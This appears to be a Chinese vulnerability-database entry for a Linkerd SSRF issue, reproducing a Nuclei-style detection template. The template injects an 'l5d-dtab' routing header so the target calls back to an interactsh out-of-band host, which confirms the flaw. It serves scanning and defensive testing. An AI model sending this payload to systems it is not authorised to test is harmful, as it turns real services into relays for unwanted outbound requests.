linkerd-ssrf-detection: Linkerd SSRF detection

日期: 2025-08-01 | 影响软件: linkerd | POC: 已公开

漏洞描述

Linkerd is vulnerable to SSRF.

PoC代码[已公开]

id: linkerd-ssrf-detection

info:
  name: Linkerd SSRF detection
  author: dudez
  severity: high
  description: Linkerd is vulnerable to SSRF.
  reference:
    - https://twitter.com/nirvana_msu/status/1084144955034165248
  metadata:
    max-request: 1
  tags: ssrf,linkerd,oast,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100a6e196b917a9765a6a48351ff8a9dce5eaa2126ccdbd6e3f5b54fb6e3fc44cec02204d0c1db5075605998445b71aa610d392fdc3148e42a2581ed152c64b56d180b0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐